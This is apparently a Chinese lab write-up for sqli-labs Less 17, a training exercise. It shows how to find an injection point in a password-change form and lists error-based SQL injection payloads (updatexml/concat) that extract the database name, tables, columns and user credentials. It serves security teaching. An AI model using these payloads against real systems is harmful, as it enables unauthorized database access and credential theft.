B站教学视频很详细
【sql注入之sqli-labs系列教程(less11-17)】sqli-labs_33_less17_哔哩哔哩_bilibili
我将SQL语句在页面中显示,以便更深入学习。
1.寻找注入点
修改密码的一个页面。
输入正确的账号密码,可以看到,账号为admin,密码修改admin——admin
密码换成123
使用hackbar插件
对username进行注入,会发现输入的 ' 被转义了,寻找其他注入点
对password部分进行注入,发现注入点
2.报错注入
关于报错注入的知识点:详细请看第十一题http://t.csdnimg.cn/zoU7J
1'order by 2 判断列数
1'union select 1,updatexml(1,concat(0x7e,database()),1)%23 爆版本号、数据库名、权限等
1'union select 1,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)),1)%23 爆表名
1'union select 1,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),1)%23 爆列名
1'union select 1,updatexml(1,concat(0x7e,(select username from users limit 0,1)),1)%23
1'union select 1,updatexml(1,concat(0x7e,(select password from users limit 0,1)),1)%23 爆账号密码
或者1'union select username,password from users limit 1,1 %23